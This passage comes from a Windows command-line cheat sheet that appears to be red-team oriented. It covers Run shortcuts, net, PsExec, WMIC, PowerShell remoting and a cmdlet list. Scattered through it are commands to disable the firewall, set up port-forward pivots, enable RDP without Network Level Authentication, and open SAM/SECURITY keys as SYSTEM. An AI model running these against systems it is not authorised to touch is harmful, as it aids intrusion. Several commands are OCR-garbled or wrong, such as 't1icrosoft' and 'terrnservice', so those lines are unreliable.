| %SystemDrive%\Users\\AppData\Roaming\Microsoft\Windows\Start\ Menu\Programs\Startup 834 | 835 | All Users: 836 | 837 | %SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup 838 | 839 | Shortcut: Run -> shell:common startup 840 | 841 | [46]: https://watchthestack.files.wordpress.com/2015/03/rtfm-red-team-field-manual.pdf 842 | 843 | Useful Run Commands 844 | ------------------- 845 | [[48]] 846 | 847 | access.cpl # Accessibility Controls 848 | accwiz # Accessibility Wizard 849 | hdwwiz.cpl # Add Hardware Wizard 850 | appwiz.cpl # Add/Remove Programs 851 | control admintools # Administrative Tools 852 | acrobat # Adobe Acrobat (if installed) 853 | formdesigner # Adobe Designer (if installed) 854 | acrodist # Adobe Distiller (if installed) 855 | imageready # Adobe ImageReady (if installed) 856 | photoshop # Adobe Photoshop (if installed) 857 | wuaucpl.cpl # Automatic Updates 858 | fsquirt # Bluetooth Transfer Wizard 859 | calc # Calculator 860 | certmgr.msc # Certificate Manager 861 | charmap # Character Map 862 | chkdsk # Check Disk Utility 863 | clipbrd # Clipboard Viewer 864 | cmd # Command Prompt 865 | dcomcnfg # Component Services 866 | compmgmt.msc # Computer Management 867 | control # Control Panel 868 | timedate.cpl # Date and Time Properties 869 | ddeshare # DDE Shares 870 | devmgmt.msc # Device Manager 871 | directx.cpl # Direct X Control Panel (if installed)* 872 | dxdiag # Direct X Troubleshooter 873 | cleanmgr # Disk Cleanup Utility 874 | dfrg.msc # Disk Defragment 875 | diskmgmt.msc # Disk Management 876 | diskpart # Disk Partition Manager 877 | control desktop # Display Properties 878 | desk.cpl # Display Properties 879 | control color # Display Properties (w/Appearance Tab Preselected) 880 | drwtsn32 # Dr. Watson System Troubleshooting Utility 881 | verifier # Driver Verifier Utility 882 | eventvwr.msc # Event Viewer 883 | migwiz # Files and Settings Transfer Tool 884 | sigverif # File Signature Verification Tool 885 | findfast.cpl # Findfast 886 | firefox # Firefox (if installed) 887 | folders # Folders Properties 888 | control fonts # Fonts 889 | fonts # Fonts Folder 890 | freecell # Free Cell Card Game 891 | joy.cpl # Game Controllers 892 | gpedit.msc # Group Policy Editor (XP Prof) 893 | mshearts # Hearts Card Game 894 | helpctr # Help and Support 895 | hypertrm # HyperTerminal 896 | iexpress # Iexpress Wizard 897 | ciadv.msc # Indexing Service 898 | icwconn1 # Internet Connection Wizard 899 | iexplore # Internet Explorer 900 | inetcpl.cpl # Internet Properties 901 | inetwiz # Internet Setup Wizard 902 | ipconfig /all # IP Configuration (Display Connection Configuration) 903 | ipconfig /displaydns # IP Configuration (Display DNS Cache Contents) 904 | ipconfig /flushdns # IP Configuration (Delete DNS Cache Contents) 905 | ipconfig /release # IP Configuration (Release All Connections) 906 | ipconfig /renew # IP Configuration (Renew All Connections) 907 | ipconfig /registerdns # IP Configuration (Refreshes DHCP & Re-Registers DNS) 908 | ipconfig /showclassid # IP Configuration (Display DHCP Class ID) 909 | ipconfig /setclassid # IP Configuration (Modifies DHCP Class ID) 910 | jpicpl32.cpl # Java Control Panel (if installed) 911 | javaws # Java Control Panel (if installed) 912 | control keyboard # Keyboard Properties 913 | secpol.msc # Local Security Settings 914 | lusrmgr.msc # Local Users and Groups 915 | logoff # Logs You Out Of Windows 916 | mrt # Malicious Software Removal Tool 917 | msaccess # Microsoft Access (if installed) 918 | winchat # Microsoft Chat 919 | excel # Microsoft Excel (if installed) 920 | frontpg # Microsoft Frontpage (if installed) 921 | moviemk # Microsoft Movie Maker 922 | mspaint # Microsoft Paint 923 | powerpnt # Microsoft Powerpoint (if installed) 924 | winword # Microsoft Word (if installed) 925 | mobsync # Microsoft Syncronization Tool 926 | winmine # Minesweeper Game 927 | control mouse # Mouse Properties 928 | main.cpl # Mouse Properties 929 | nero # Nero (if installed) 930 | conf # Netmeeting 931 | control netconnections # Network Connections 932 | ncpa.cpl # Network Connections 933 | netsetup.cpl # Network Setup Wizard 934 | notepad # Notepad 935 | nvtuicpl.cpl # Nview Desktop Manager (if installed) 936 | packager # Object Packager 937 | odbccp32.cpl # ODBC Data Source Administrator 938 | osk # On Screen Keyboard 939 | ac3filter.cpl # Opens AC3 Filter (if installed) 940 | msimn # Outlook Express 941 | pbrush # Paint 942 | password.cpl # Password Properties 943 | perfmon.msc # Performance Monitor 944 | perfmon # Performance Monitor 945 | telephon.cpl # Phone and Modem Options 946 | dialer # Phone Dialer 947 | pinball # Pinball Game 948 | powercfg.cpl # Power Configuration 949 | control printers # Printers and Faxes 950 | printers # Printers Folder 951 | eudcedit # Private Character Editor 952 | QuickTime.cpl # Quicktime (If Installed) 953 | quicktimeplayer # Quicktime Player (if installed) 954 | realplay # Real Player (if installed) 955 | intl.cpl # Regional Settings 956 | regedit # Registry Editor 957 | regedit32 # Registry Editor 958 | rasphone # Remote Access Phonebook 959 | mstsc # Remote Desktop 960 | ntmsmgr.msc # Removable Storage 961 | ntmsoprq.msc # Removable Storage Operator Requests 962 | rsop.msc # Resultant Set of Policy (XP Prof) 963 | sticpl.cpl # Scanners and Cameras 964 | control schedtasks # Scheduled Tasks 965 | wscui.cpl # Security Center 966 | services.msc # Services 967 | fsmgmt.msc # Shared Folders 968 | shutdown # Shuts Down Windows 969 | mmsys.cpl # Sounds and Audio 970 | spider # Spider Solitare Card Game 971 | cliconfg # SQL Client Configuration 972 | sysedit # System Configuration Editor 973 | msconfig # System Configuration Utility 974 | sfc /scannow # System File Checker Utility (Scan Immediately) 975 | sfc /scanonce # System File Checker Utility (Scan Once At The Next Boot) 976 | sfc /scanboot # System File Checker Utility (Scan On Every Boot) 977 | sfc /revert # System File Checker Utility (Return Scan Setting To Default) 978 | sfc /purgecache # System File Checker Utility (Purge File Cache) 979 | sfc /cachesize=x # System File Checker Utility (Sets Cache Size to size x) 980 | msinfo32 # System Information 981 | sysdm.cpl # System Properties 982 | taskmgr # Task Manager 983 | tcptest # TCP Tester 984 | telnet # Telnet Client 985 | tweakui # Tweak UI (if installed) 986 | nusrmgr.cpl # User Account Management 987 | utilman # Utility Manager 988 | wab # Windows Address Book 989 | wabmig # Windows Address Book Import Utility 990 | ntbackup # Windows Backup Utility (if installed) 991 | explorer # Windows Explorer 992 | firewall.cpl # Windows Firewall 993 | magnify # Windows Magnifier 994 | wmimgmt.msc # Windows Management Infrastructure 995 | wmplayer # Windows Media Player 996 | msmsgs # Windows Messenger 997 | wiaacmgr # Windows Picture Import Wizard (need camera connected) 998 | syskey # Windows System Security Tool 999 | wupdmgr # Windows Update Launches 1000 | winver # Windows Version (to show which version of windows) 1001 | tourstart # Windows XP Tour Wizard 1002 | write # Wordpad 1003 | [48]: 1004 | 1005 | Systeminfo 1006 | ---------- 1007 | 1008 | ### Syntax[[54]] 1009 | 1010 | systeminfo [/s [/u \ [/p ]]] [/fo {TABLE | LIST | CSV}] [/nh] 1011 | 1012 | /s # Specifies the name or IP address of a remote computer 1013 | /u # Runs the command with the account permissions of the specified user account 1014 | /p # Specifies the password of the user account that is specified in the /u parameter 1015 | /fo # Specifies the output format 1016 | /nh # Suppresses column headers in the output. 1017 | /? # Displays help at the command prompt. 1018 | 1019 | # Tasklist 1020 | 1021 | ### Syntax 1022 | 1023 | tasklist[.exe] [/s computer] [/u domain\user [/p password]] [/fo {TABLE|LIST|CSV}] [/nh] [/fi FilterName [/fi FilterName2 [ ... ]]] [/m [ModuleName] | /svc | /v] 1024 | # Reg query 1025 | 1026 | ### Syntax 1027 | reg query [{/v | /ve}] [/s] [/se ] [/f ] [{/k | /d}] [/c] [/e] [/t ] [/z] 1028 | 1029 | /ve # Runs a query for value names that are empty 1030 | /s # Specifies to query all subkeys and value names recursively 1031 | /se # Specifies the single value separator to search for in the value name type REG_MULTI_SZ 1032 | /f # Specifies the data or pattern to search for 1033 | /k # Specifies to search in key names only 1034 | /d # Specifies to search in data only 1035 | /c # Specifies that the query is case sensitive 1036 | /e # Specifies to return only exact matches 1037 | /t # Specifies registry types to search 1038 | /z # Specifies to include the numeric equivalent for the registry type in search results 1039 | 1040 | 1041 | [54]: 1042 | 1043 | Windows Net/Domain Commands 1044 | --------------------------- 1045 | 1046 | ### Net user - Syntax[[52]] 1047 | 1048 | net user [ { | *} []] [/domain] 1049 | net user [ { | *} /add [] [/domain]] 1050 | net user [ [/delete] [/domain]] 1051 | 1052 | ### Net user - Examples 1053 | 1054 | net view \\production # To see a list of the resources shared by the \\Production computer 1055 | net view /domain:sales # To see a list of the computers in the sales domain or workgroup 1056 | 1057 | ### Net view - Syntax 1058 | 1059 | net view [\\ComputerName [/CACHE] | [/ALL] | /DOMAIN[:DomainName]] 1060 | 1061 | ### Net group - Syntax 1062 | 1063 | net group [ [/comment:""]] [/domain] 1064 | net group [{/add [/comment:""] | /delete} [/domain]] 1065 | net group [ [ ...] {/add | /delete} [/domain]] 1066 | 1067 | ### Net group - Examples 1068 | 1069 | net group # This example lists all the groups on the local server 1070 | net group exec /add # This example adds a group called Exec to the local user accounts database 1071 | net group exec /add /domain # This example adds a group called Exec to the domain database 1072 | net group exec estherv ralfr stevent /add # This example adds the existing user accounts estherv, ralfr, and stevent to the Exec group on the local computer 1073 | net group exec estherv ralfr stevent /add /domain # This example adds the existing user accounts estherv, ralfr, and stevent to the Exec group in the domain database 1074 | net group exec # This example displays users in the Exec group 1075 | net group exec /comment:"The executive staff" # This example adds a comment to the Exec group record 1076 | 1077 | [52]: 1078 | 1079 | Running remote commands 1080 | ----------------------- 1081 | 1082 | Many Windows PowerShell cmdlets have the ComputerName parameter that enables you to collect data and change settings on one or more remote computers. They use a variety of communication technologies and many work on all Windows operating systems that Windows PowerShell supports without any special configuration.[[42]] 1083 | 1084 | Typically, cmdlets that support remoting without special configuration have the ComputerName parameter and do not have the Session parameter. To find these cmdlets in your session, type: 1085 | 1086 | Get-Command | where { $_.parameters.keys -contains "ComputerName" -and $_.parameters.keys -notcontains "Session"} 1087 | 1088 | ### Start an Interactive Session 1089 | 1090 | To start an interactive session with a single remote computer, we use the Enter-PSSession cmdlet. 1091 | 1092 | Enter-PSSession Server01 1093 | 1094 | ### Exit Session 1095 | 1096 | Exit-PSSession 1097 | 1098 | ### Running a remote command 1099 | 1100 | To run any command on one or many remote computers, use the Invoke-Command cmdlet. For example, to run a Get-UICulture command on the Server01 and Server02 remote computers, type: 1101 | 1102 | Invoke-Command -ComputerName Server01, Server02 {Get-UICulture} 1103 | 1104 | ### Output example 1105 | 1106 | ![Untitled.png](https://www.dropbox.com/s/k545zhqu94vn33c/Untitled.png?dl=0&raw=1) 1107 | 1108 | ### Run a script 1109 | 1110 | Invoke-Command -ComputerName Server01, Server02 -FilePath c:\Scripts\DiskCollect.ps1 1111 | 1112 | ### Establish a Persistent Connection 1113 | Following command creates a remote session on the Server01 computer and another remote session on the Server02 computer. It saves the session objects in the $s variable. 1114 | 1115 | $s = New-PSSession -ComputerName Server01, Server02 1116 | 1117 | following command creates a remote session on the Server01 computer and another remote session on the Server02 computer. It saves the session objects in the $s variable. 1118 | 1119 | Invoke-Command -Session $s {$h = Get-HotFix} 1120 | 1121 | Now you can use the data in the $h variable in subsequent commands, such as the following one. The results are displayed on the local computer. 1122 | 1123 | Invoke-Command -Session $s {$h | where {$_.installedby -ne "NTAUTHORITY\SYSTEM"}} 1124 | 1125 | [42]: 1126 | 1127 | Windows network commands 1128 | ------------------------ 1129 | [[53]] 1130 | 1131 | $ Arp # Display or manipulate the ARP information on a network device or computer. 1132 | $ Finger # The finger command available in Unix and Linux variants allows a user to find sometimes personal information about a user. 1133 | $ Hostname # The hostname command displays the host name of the Windows XP computer currently logged into 1134 | $ Ipconfig # Display the network settings currently assigned and given by a network 1135 | $ Pathping # Pathping is an MS-DOS utility available for Microsoft Windows 2000 and Windows XP users. This utility enables a user to find network latency and network loss 1136 | $ Ping # Pinging another address helps determine if the network card can communicate within the local network or outside network 1137 | $ Nbstat # The nbtstat MS-DOS utility that displays protocol statistics and current TCP/IP connections using NBT 1138 | $ Net # The net command is available in MS-DOS and Windows and is used to set, view, and determine network settings 1139 | $ Netstat # The netstat command is used to display the TCP/IP network protocol statistics and information 1140 | $ Nslookup # The nslookup MS-DOS utility that enables a user to do a reverse lookup on an IP address of a domain or host on a network 1141 | $ Route # The route MS-DOS utility enables computers to view and modify the computer's route table 1142 | & Tracert and traceroute # It allows you to view a listing of how a network packet travels through the network and where it may fail or slow down 1143 | $ Whois # The whois command available in Unix and Linux variants helps allow a user to identify a domain name. This command provides information about a domain name much like the WHOIS on network solutions. 1144 | $ Winipcfg # The winipcfg command available in Windows allows a user to display network and network adapter information. Here, a user can find such information as an IP address, Subnet Mask, Gateway, etc. 1145 | 1146 | [53]: 1147 | 1148 | Hidden tools in Command Line 1149 | ---------------------------- 1150 | 1151 | NOTICE: You need to run CMD with administrator privileges [[10]] 1152 | 1153 | ### System file checker 1154 | 1155 | $ sfc /scannow # This performs an immediate scan of your system and will replace files as necessary. You may need to restart Windows when it's done if it finds problems 1156 | $ sfc /scanonce # This performs a scan the next time you restart your system 1157 | $ sfc /scanboot # This schedules a scan to be performed every time you restart your system 1158 | $ sfc Revert # This returns the System File Checker to its default settings. You can use it to turn off the /scanboot option, for example 1159 | 1160 | ### Check disk 1161 | 1162 | $ chkdsk Volume # If you want to check a whole drive, just type the drive letter 1163 | $ chkdsk Filename # You can also use chkdsk to check a single file or group of files 1164 | $ chkdsk /F # Run it with this option to have chkdsk go ahead and fix those errors 1165 | $ chkdsk /R # This option forces chkdsk to locate bad sectors and recover information from them. If chkdsk cannot lock the disk (which it usually can't since you're actually using Windows), it will prompt you run the command the next time you restart Windows 1166 | 1167 | ### Cipher 1168 | 1169 | $ cipher /W:pathname # The /W option removes data on unused portions of a volume, effectively erasing data that may be hanging around on your hard drive after deletion. You can point cipher at an entire volume (like C:) or a specific folder 1170 | 1171 | NOTICE: This applies to traditional hard drives and not SSDs 1172 | 1173 | ### Driverquery 1174 | 1175 | $ driverquery /s # This option lets you specify the name or IP address of a remote computer so that you investigate the drivers it has installed 1176 | $ driverquery /si # This option shows you the digital signature information for drivers 1177 | $ driverquery /fo # This is really the key option you'll use with driverquery. It lets you specify the format in which information is displayed so that you can more effectively save it as a report. 1178 | 1179 | Example: driverquery /fo CSV > drivers.csv 1180 | 1181 | ![g91lech9vvrplpbh0qnd.png](https://www.dropbox.com/s/mfgbhgugjic88vq/g91lech9vvrplpbh0qnd.png?dl=0&raw=1) 1182 | 1183 | [10]: 1184 | 1185 | Miscellaneous commands Windows 1186 | ------------------------------ 1187 | 1188 | ### Lock Workstation [[37]] 1189 | 1190 | rundll32.dll user32.dll LockWorkstation 1191 | 1192 | ### Disable Windows Firewall 1193 | 1194 | netsh advfirewall set currentprofile state off 1195 | netsh advfirewall set allprofiles state off 1196 | 1197 | ### Native Windows Port Forward 1198 | 1199 | netsh interface portproxy add v4tov4 listenport=3000 1200 | netsh advfirewall set allprofiles state off 1201 | 1202 | ### Native Windows Port Forward 1203 | 1204 | netsh interface portproxy add v4tov4 listenport=3000 1205 | listenaddress=l.l.l.l connectport=4000 connectaddress=2.2.2.2 1206 | 1207 | #Remove 1208 | netsh interface portproxy delete v4tov4 listenport=3000 1209 | listenaddress=l.l.l.l 1210 | 1211 | NOTICE: Must use administrative privileges. 1212 | 1213 | ### Re-Enable Command prompt 1214 | 1215 | reg add HKCU\Software\Policies\t1icrosoft\Windows\System /v DisableCHD /tREG DWORD /d 0 /f 1216 | 1217 | [37]: 1218 | 1219 | PsExec 1220 | ------ 1221 | 1222 | PsExec is a light-weight telnet-replacement that lets you execute processes on other systems, complete with full interactivity for console applications, without having to manually install client software.[[41]] 1223 | 1224 | # The following command launches an interactive command prompt on \\marklap: 1225 | 1226 | psexec \\marklap cmd 1227 | 1228 | # This command executes IpConfig on the remote system with the /all switch, and displays the resulting output locally 1229 | 1230 | psexec \\marklap ipconfig /all 1231 | 1232 | # This command copies the program test.exe to the remote system and executes it interactively 1233 | 1234 | psexec \\marklap -c test.exe 1235 | 1236 | # Specify the full path to a program that is already installed on a remote system if its not on the system's path 1237 | 1238 | psexec \\marklap c:\bin\test.exe 1239 | 1240 | # Run Regedit interactively in the System account to view the contents of the SAM and SECURITY keys 1241 | 1242 | psexec -i -d -s c:\windows\regedit.exe 1243 | 1244 | # To run Internet Explorer as with limited-user privileges use this command 1245 | 1246 | psexec -l -d "c:\program files\internet explorer\iexplore.exe" 1247 | 1248 | [41]: 1249 | 1250 | Terminal Services 1251 | ----------------- 1252 | 1253 | Terminal Services provides the ability to host multiple, simultaneous client sessions on Microsoft Windows Server 2003.[[47]] 1254 | 1255 | ### Terminal Services Arhitecture 1256 | 1257 | ![aa.gif](https://www.dropbox.com/s/mon59ohqha3p7g8/aa.gif?dl=0&raw=1) 1258 | 1259 | ### Start RDP 1260 | 1261 | 1. Create regfile.reg file with following line in it: 1262 | HKEY LOCAL t1ACHINE\SYSTEH\CurrentControlSet \Control\ TerminalService 1263 | 2. "fDe~yTSCo~nections"=dword: 00000000 1264 | 3. reg import reg file. reg 1265 | 4. net start ''terrnservice'' 1266 | 5. sc config terrnservice start= auto 1267 | 6. net start terrnservice 1268 | 1269 | ### Disable Network Level Authentification, Add Firewall Excpetion 1270 | 1271 | reg add "HKEY LOCAL t1ACHINE\SYSTEt1\CurentControlSet\Control \Terminal 1272 | Server\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d "0" /f 1273 | netsh firewall set service type = remotedesktop mode = enable 1274 | 1275 | [47]: 1276 | 1277 | WMIC 1278 | ---- 1279 | 1280 | WMIC extends WMI for operation from several command-line interfaces and through batch scripts. Before WMIC, you used WMI-based applications (such as SMS), the WMI Scripting API, or tools such as CIM Studio to manage WMI-enabled computers. Without a firm grasp on a programming language such as C++ or a scripting language such as VBScript and a basic understanding of the WMI namespace, do-it-yourself systems management with WMI was difficult. WMIC changes this situation by giving you a powerful, user-friendly interface to the WMI namespace.[[51]] 1281 | 1282 | ### Listing 1: Code to Display 1283 | 1284 | Results at the 1285 | Console from a WMIC Batch File 1286 | wmic /node:SERVER1, SERVER4 1287 | cpu get name, caption, 1288 | maxclockspeed, systemname 1289 | /format:textvaluelist.xsl 1290 | 1291 | ### Listing 2: Code to Use Variables in a WMIC Batch File 1292 | 1293 | @echo off 1294 | if "%1"=="" goto msg 1295 | if "%2"=="" goto single 1296 | wmic /node:%1, %2 cpu get name, 1297 | caption, maxclockspeed, 1298 | systemname 1299 | /format:textvaluelist.xsl 1300 | goto end 1301 | :single 1302 | wmic /node:%1 cpu get name, 1303 | caption, maxclockspeed, 1304 | systemname 1305 | /format:textvaluelist.xsl 1306 | goto end 1307 | :msg 1308 | echo you must specify at least 1309 | one computer name. 1310 | :end 1311 | 1312 | ### Listing 3: Code to Direct WMIC Output to an HTML File 1313 | wmic /node:SERVER4 1314 | /output:e:\file1.htm cpu get 1315 | description, maxclockspeed, 1316 | extclock, manufacturer, 1317 | revision /format:hform.xsl 1318 | ### Listing 4: Code to Direct Class 1319 | Command Output to an HTML File 1320 | wmic /output:e:\se_class.htm 1321 | class WIN32_SOFTWAREELEMENT 1322 | get 1323 | ### Listing 5: Code to Generate XML Output from a WMIC Command 1324 | wmic cpu get maxclockspeed 1325 | /translate:basicxml 1326 | /format:rawxml.xsl 1327 | [51]: 1328 | 1329 | Powershell 1330 | ---------- 1331 | [[40]] 1332 | 1333 | # # Comment / Remark 1334 | $_ # The current pipeline object 1335 | $variable = "value" # Define a variable also: ${n!a#me} = "value" 1336 | % # Alias for ForEach-Object 1337 | --% # Stop parsing input 1338 | & (call) # Run a command, script or function 1339 | . (source) # Run a command script in the current shell 1340 | ? # Alias for Where-Object 1341 | @(...) # Force an expression to be evaluated as an array 1342 | #NAME? # Format operator 1343 | Active Directory # Account, Computer, Group and User cmdlets 1344 | Add-Computer # Add a computer to the domain 1345 | Add-Content # Add to the content of the item 1346 | Add-History # Add entries to the session history 1347 | Add-Member # Add a member to an instance of a PowerShell object 1348 | Add-PsSnapIn # Add snap-ins to the console 1349 | Add-Type # Add a .NET Framework type to a PowerShell session 1350 | Add-WindowsFeature # Install roles, role services, and features 1351 | Backup-GPO # Backup group policy objects (GPOs) 1352 | Backup-GPO # Backup group policy objects (GPOs) 1353 | Begin # Function BEGIN block 1354 | BITS # Background Intelligent Transfer Service cmdlets 1355 | Break # Exit a program loop 1356 | Catch # Handle a terminating error within a scriptblock 1357 | Checkpoint-Computer # Create a system restore point (XP) 1358 | Checkpoint-Web # Create a checkpoint for an IIS web app 1359 | Clear-Content # Remove content from a file/item 1360 | Clear-EventLog # Delete all entries from an event log 1361 | Clear-History # Delete entries from the session history 1362 | Clear-Host # Clear the screen 1363 | Clear-Host # Clear the screen 1364 | Clear-Item # Remove content from a variable or an alias 1365 | Clear-ItemProperty # Remove the property value from a property 1366 | Clear-Variable # Remove the value from a variable 1367 | Compare-Object # Compare the properties of objects 1368 | Compare-Object # Compare the properties of objects 1369 | Complete-Transaction # Commit the transaction 1370 | Compress-Archive # Create a new archive/zipped file [PS 5+] 1371 | Connect-WSMan # Connect to the WinRM service on a remote computer 1372 | Continue # Skip just this iteration of a loop 1373 | ConvertFrom-CSV # Convert object properties (in CSV format) into CSV objects 1374 | ConvertFrom-SecureString # Convert a secure string into an encrypted standard string 1375 | ConvertFrom-StringData # Convert a here-string into a hash table 1376 | Convert-Path # Convert a ps path to a provider path 1377 | ConvertTo-CSV # Convert .NET Framework objects into CSV variable 1378 | ConvertTo-Html # Convert the input into an HTML table 1379 | ConvertTo-SecureString # Convert an encrypted standard string into a secure string 1380 | ConvertTo-Xml # Convert the input into XML 1381 | Copy-Item # Copy an item from a namespace location 1382 | Copy-ItemProperty # Copy a property along with it's value 1383 | Debug-Process # Attach a debugger to a running process 1384 | Disable-ComputerRestore # Disable System Restore on a drive 1385 | Disable-PSBreakpoint # Disable a breakpoint in the current console 1386 | Disable-PSRemoting # Disable remote session configuration on the local computer 1387 | Disable-PSSessionConfiguration # Disable session configurations on the local computer 1388 | Disable-WSMAnCredSSP # Disable Credential Security Service Provider (SSP) authentication 1389 | Disconnect-WSMan # Disconnect from the WinRM service on a remote 1390 | Do # Loop while a condition is True 1391 | Enable-ComputerRestore # Enable System Restore on a drive 1392 | Enable-PSBreakpoint # Enable a breakpoint in the current console 1393 | Enable-PSRemotRemoting # Run PowerShell commands on remote computers 1394 | Enable-PSSessionConfiguration # Enable session configurations on the local computer 1395 | Enable-WSManCredSSP # Enable Credential SSP authentication 1396 | End # Function END block 1397 | Enter-PSSessio # Start an interactive session with a remote computer 1398 | Exit-PSSession # Exit PowerShell (or exit a script) 1399 | Exit-PSSession # End an interactive session with a remote computer 1400 | Expand-Archive # Extract files from an archive (zipped) file [PS 1401 | Export-Alias # Export an alias list to a file 1402 | Export-Clixml # Produce a clixml representation of PowerShell ob 1403 | Export-Console # Export console configuration to a file 1404 | Export-Counter # Export Performance Counter data to log files 1405 | Export-Csv # Export to Comma Separated Values (spreadsheet) 1406 | Export-FormatData # Save formatting data from the current session 1407 | Export-ModuleMember # Export specific module members 1408 | Export-PSSession # Import commands and save them in a PowerShell mo 1409 | For # Loop through items that match a condition 1410 | ForEach # Loop through each item in a collection 1411 | ForEach method # Loop through each item in a collection 1412 | ForEach-Object # Reach Loop through each item in the pipeline ( % ) 1413 | Format-Custom # Format output using a customized view 1414 | Format-List # Format output as a list of properties, each on a 1415 | Format-Table # Format output as a table 1416 | Format-Wide # Format output as a table listing one property on 1417 | Get-Acl # Get permission settings for a file or registry ke 1418 | Get-Alias # Return alias names for Cmdlets 1419 | Get-AuthenticonSignature # Get the signature object associated with a file 1420 | Get-ChildItem # Get child items (contents of a folder or registry) 1421 | Get-Command # Get basic information about cmdlets 1422 | Get-Command # Retrieve basic information about a command 1423 | Get-ComputerRestorePoint # Get the restore points on the local computer 1424 | Get-Content # Get content from item (specific location) 1425 | Get-Counter # Get performance counter data 1426 | Get-Credential # Get a security credential (username/password) 1427 | Get-Culture # Get region information (language and keyboard la 1428 | Get-Date # Get current date and time 1429 | Get-DscConfiguration # Get the current config. of a node 1430 | Get-DscLocalConfigurationManager # Get Local Config Manager settings 1431 | Get-DscResource # Get Desired State Config. resources from a compute 1432 | Get-Event # Get events in the PowerShell event queue 1433 | Get-Eventlog # Get event log data (2003) 1434 | Get-EventSubscriber # Get event subscribers 1435 | Get-ExecutionPolicy # Get the execution policy for the shell 1436 | Get-FormatData # Get the formatting data in the current session 1437 | Get-Help # Open the help file 1438 | Get-History # Get a listing of the session history 1439 | Get-Host # Get host information (PowerShell Version and Region) 1440 | Get-HotFix # Get Installed hotfixes 1441 | Get-Item # Get a file/registry object (or any other namespa 1442 | Get-Item # Get a file object or get a registry (or other names) 1443 | Get-ItemProperty # Retrieve the properties of an object 1444 | Get-Job # Get PowerShell background jobs that are running 1445 | Get-Location # Get and display the current location 1446 | Get-Member # Enumerate the properties of an object 1447 | Get-Module # Get the modules imported to the session 1448 | Get-Pfxcertificate # Get pfx certificate information 1449 | Get-Process # Get a list of processes on a machine 1450 | Get-PSBreakpoint # Get the currently set breakpoints 1451 | Get-PSDrive # Get drive information (DriveInfo) 1452 | Get-PSProvider # Get information for the specified provider 1453 | Get-PSSession # Get the PSSessions in the current session 1454 | Get-PSSessionConfiguration # Get the registered PS session configuration 1455 | Get-PsSnapin # List PowerShell snap-ins on this computer 1456 | Get-Random # Get a random number 1457 | Get-Service # Get a list of services 1458 | Get-Tracesource # Get components that are instrumented for tracing 1459 | Get-Transaction # Get information about the active transaction 1460 | Get-Uiculture # Get the ui culture information 1461 | Get-Unique # Get the unique items in a collection 1462 | Get-Variable # Get a PowerShell variable 1463 | Get-WebApplicationMonitoringStatus # Get the monitoring status of web apps 1464 | Get-WindowsFeature # Retrieve roles, role services, and features 1465 | Get-WinEvent # Get event log data (Vista+) 1466 | Get-WmiObject # Get WMI class information 1467 | Get-WSManCredSSP # Get the Credential SSP configuration 1468 | Get-WSManInstance # Display management information (XML or value) 1469 | Group-Object # Group objects that contain the same value 1470 | if # Conditionally perform a command 1471 | Import-Alias # Import an alias list from a file 1472 | Import-Clixml # Import a clixml file and rebuild the PS object 1473 | Import-Counter # Import performance counter log files 1474 | Import-Csv # Take values from a CSV list and send objects dow 1475 | Import-GPO # Import Group Policy settings into a specified GPO 1476 | Import-Module # Add a module to the session 1477 | Import-PSSession # Import commands from another session 1478 | Invoke-Command # Run commands on local and remote computers 1479 | Invoke-Command # Run command 1480 | Invoke-Express # Run a PowerShell expression 1481 | Invoke-History # Invoke a previously executed Cmdlet 1482 | Invoke-Item # Invoke an executable or open a file (START) 1483 | Invoke-WmiMethod # Call WMI methods 1484 | Invoke-WSManAction # Invoke an action on a specified object 1485 | Job Trigger cmdlets # Get/Set Scheduled job triggers 1486 | Join-Path # Combine a path and child-path 1487 | Limit-EventLog # Limit the size of the event log 1488 | Measure-Command # Measure running time 1489 | Measure-Object # Measure the properties of an object 1490 | Move-Item # Move an item from one location to another 1491 | Move-ItemProperty # Move a property from one location to another 1492 | New-Alias # Create a new alias. 1493 | New-DSCCheckSum # Create checksum files for DSC docs/resources 1494 | New-Event # Create a new event 1495 | New-Eventlog # Create a new event log and a new event source 1496 | New-Item # Create a new item in a namespace 1497 | New-ItemProperty # Set a new property 1498 | New-Module # Create a new dynamic module (only in memory) 1499 | New-Object # Create a new .Net object 1500 | New-PSDrive # Create a mapped network drive 1501 | New-PSSession # Create a persistent connection to a local or remote 1502 | New-PSSessionOption # Advanced options for a PSSession 1503 | New-Service # Create a new service 1504 | New-Timespan # Create a timespan object 1505 | New-Variable # Create a new variable 1506 | New-WebServiceProxy # Create a Web service proxy object 1507 | New-WSManInstance # Create a new instance of a management resource 1508 | New-WSManSessionOption # Options for WSMan commands 1509 | Out-Default # Send output to default 1510 | Out-File # Send output to a file 1511 | Out-GridView # Send output to an interactive table 1512 | Out-Host # Send output to the host 1513 | Out-Null # Send output to null 1514 | Out-Printer # Send the output to a printer 1515 | Out-String # Send objects to the host as strings 1516 | Param # Script Parameters 1517 | Pause # Pause and display the message "Press Enter to continue" 1518 | Pop-Location # Set the current working location from the stack 1519 | Pop-Location # Set the current working location from the stack 1520 | Powershell # Launch a PowerShell session 1521 | Process # Function PROCESS block 1522 | Push-Location # Push a location to the stack 1523 | Push-Location # Push a location to the stack 1524 | Quest AD # Read and write to Active Directory 1525 | Read-Host # Read a line of input from the host console 1526 | Read-Host # Read a line of input from the host console 1527 | Receive-Job # Get PowerShell background job results 1528 | Register-EngineEvent # Subscribe to PowerShell events 1529 | Register-ObjectEvent # Subscribe to .NET events 1530 | Register-PSSessionConfiguration # Create and register a new PS session confi 1531 | Register-WmiEvent # Subscribe to a WMI event 1532 | Remove-Computer # Remove the local computer from a workgroup or doma 1533 | Remove-Event # Delete events from the event queue 1534 | Remove-EventLog # Delete an event log 1535 | Remove-Item D # se/rd/rm/rmdir Delete an item 1536 | Remove-Item r # erase/rd/ri/rmdir Remove an item 1537 | Remove-Item r # erase/rd/ri/rmdir Remove an item 1538 | Remove-ItemProperty # Remove a property and its value 1539 | Remove-Job # Delete a PowerShell background job 1540 | Remove-Module # Remove a module from the current session 1541 | Remove-PSBreakpoint # Delete breakpoints from the current console 1542 | Remove-PSDrive # Remove a provider/drive from its location 1543 | Remove-PSSession # Close PowerShell sessions 1544 | Remove-PSSnapin # Remove PowerShell snap-ins from the console 1545 | Remove-Variable # Remove a variable and its value 1546 | Remove-Windows # Remove roles, role services, and features 1547 | Remove-WmiObject # Delete an instance of a WMI class 1548 | Remove-WSManInstance # Delete a management resource instance 1549 | Rename-Item # Change the name of an existing item 1550 | Rename-ItemProperty # Rename a property of an item 1551 | Rename-ItemProperty # Renames a property at its location 1552 | Reset-Computer # Password Reset the machine account password for the computer 1553 | 